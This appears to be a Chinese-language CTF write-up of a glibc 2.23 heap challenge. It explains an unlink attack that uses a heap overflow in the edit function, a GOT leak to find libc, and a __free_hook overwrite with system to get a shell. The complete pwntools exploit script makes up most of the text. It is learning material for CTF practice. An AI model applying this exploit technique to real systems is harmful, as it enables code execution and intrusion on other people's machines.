下载 checksec exeinfo:
64位 IDA64查看函数
堆题 增删查改都齐全
编辑函数存在堆溢出 同时buf是全局变量 位于bss段
那么就能利用unlink来让指针指向buf所在地址区域
接下来利用该区域泄露libc从而得到free_hook地址 来getshell
exp:
from pwn import *
from LibcSearcher import *
p = process('./service')
#p = remote("node4.anna.nssctf.cn", 28848)
elf = ELF('./service')
context(arch='amd64',log_level='debug')
def touch(size):
p.sendlineafter("chooice :\n", b'1')
p.sendlineafter("size : \n", str(size).encode())
def delete(index):
p.sendlineafter("chooice :\n", b'2')
p.sendlineafter("delete\n", str(index).encode())
def show(index):
p.sendlineafter("chooice :\n", b'3')
p.sendlineafter(" show\n", str(index).encode())
def edit(index,payload):
p.sendlineafter("chooice :\n", b'4')
p.sendlineafter("modify :\n", str(index).encode())
p.sendafter("content\n",payload)
buf_addr = 0x6020C0
fd = buf_addr - 0x18
bk = buf_addr - 0x10
touch(0x20)
touch(0x80)
touch(0x100)
#gdb.attach(p)
#pause()
payload = p64(0) + p64(0x20) + p64(fd) + p64(bk) + p64(0x20) + p64(0x90)
edit(0, payload)
delete(1)
payload = p64(0) * 3 + p64(0x6020c8)
edit(0,payload)
edit(0, p64(elf.got['puts']))
show(1)
p.recvuntil(': \n')
puts_addr = u64(p.recv(6).ljust(8, b'\x00'))
print(hex(puts_addr))
libc = ELF('/home/kiana/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
offset = puts_addr - libc.symbols['puts']
free_hook = offset + libc.symbols['__free_hook']
binsh = offset + next(libc.search(b'/bin/sh\x00'))
system = offset + libc.symbols['system']
payload = p64(free_hook) + p64(binsh)
edit(0, payload)
edit(1, p64(system))
delete(2)
p.interactive()一个简单的图示:
运行 得到flag:
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
